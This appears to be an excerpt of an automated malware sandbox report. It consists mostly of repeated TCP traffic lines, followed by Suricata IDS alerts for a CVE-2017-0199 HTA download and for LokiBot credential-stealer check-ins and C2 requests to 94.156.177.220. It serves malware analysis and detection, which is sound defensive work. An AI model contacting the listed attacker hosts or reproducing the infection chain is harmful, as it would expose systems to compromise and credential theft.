                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.3.176.141:80 -> 192.168.2.22:49166
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80
                Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.176.141:80

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49164
                Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 192.3.176.141:80 -> 192.168.2.22:49166
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49196 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49174 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49174 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49174 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49174 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49178 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49174 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49177 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49179 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49190 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49205 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.22:49177
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49181 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49185 -> 94.156.177.220:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49181 -> 94.156.177.220:80
